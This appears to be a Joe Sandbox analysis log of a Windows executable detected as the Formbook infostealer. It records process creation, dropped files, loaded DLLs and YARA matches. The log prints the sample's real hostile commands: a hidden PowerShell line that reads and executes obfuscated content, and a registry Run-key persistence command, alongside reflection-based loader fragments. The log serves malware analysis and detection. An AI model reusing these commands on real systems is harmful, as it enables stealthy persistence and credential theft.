Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403373
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Windows\resources\0809\chlorinity
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Windows\resources\0809\chlorinity\Maengdelaere
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsp146C.tmp\nsExec.dll 938580B466533DFA1461E9858FD106B60E1A52B713380915CC03AFD3E4B4573C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D4EA12 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D15130 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22CCB970 appears 226 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D27E54 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: String function: 22D5F290 appears 101 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03785130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0373B970 appears 262 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 037BEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03797E54 appears 107 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 037CF290 appears 103 times
Source: 16042024124521.exe Static PE information: invalid certificate
Source: 16042024124521.exe, 00000000.00000000.1635388770.0000000000450000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamenoncrystallisings.exe2 vs 16042024124521.exe
Source: 16042024124521.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/70@2/3
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403373
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046E6
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004020FE CoCreateInstance, 0_2_004020FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Users\user\Desktop\16042024124521.exe File created: C:\Users\user\AppData\Local\Temp\nsj1229.tmp
Source: 16042024124521.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\16042024124521.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\16042024124521.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 16042024124521.exe Virustotal: Detection: 20%
Source: C:\Users\user\Desktop\16042024124521.exe File read: C:\Users\user\Desktop\16042024124521.exe
Source: unknown Process created: C:\Users\user\Desktop\16042024124521.exe "C:\Users\user\Desktop\16042024124521.exe"
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Kanels.exe "C:\Users\user\AppData\Local\Temp\Kanels.exe"
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\16042024124521.exe Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\16042024124521.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: 16042024124521.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2393562769.0000000007605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2877935687.0000000000FFE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Core.pdbDZ source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Kanels.exe, Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000001.00000002.2393562769.0000000007613000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000001.00000002.2395946843.000000000AC89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2486243322.00000000035E9000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Musicerede $Piecer $Lipotropism), (Silurian @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vrtshusholder28 = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Diviningly)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($modeskaber, $false).DefineType($Dyrevenners, $
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Users\user\Desktop\16042024124521.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)"
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA225F pushad ; ret 7_2_22CA27F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA27FA pushad ; ret 7_2_22CA27F9
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA283D push eax; iretd 7_2_22CA2858
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD09AD push ecx; mov dword ptr [esp], ecx 7_2_22CD09B6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA1200 push edx; retf 0022h 7_2_22CA1206
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA135E push eax; iretd 7_2_22CA1369
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA1BC7 push eax; retf 7_2_22CA1BBE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA1BB7 push eax; retf 7_2_22CA1BBE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA18A7 push ds; retf 7_2_22CA198E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CA19DB push 262822DCh; retf 7_2_22CA19EA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0371225F pushad ; ret 12_2_037127F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037127FA pushad ; ret 12_2_037127F9
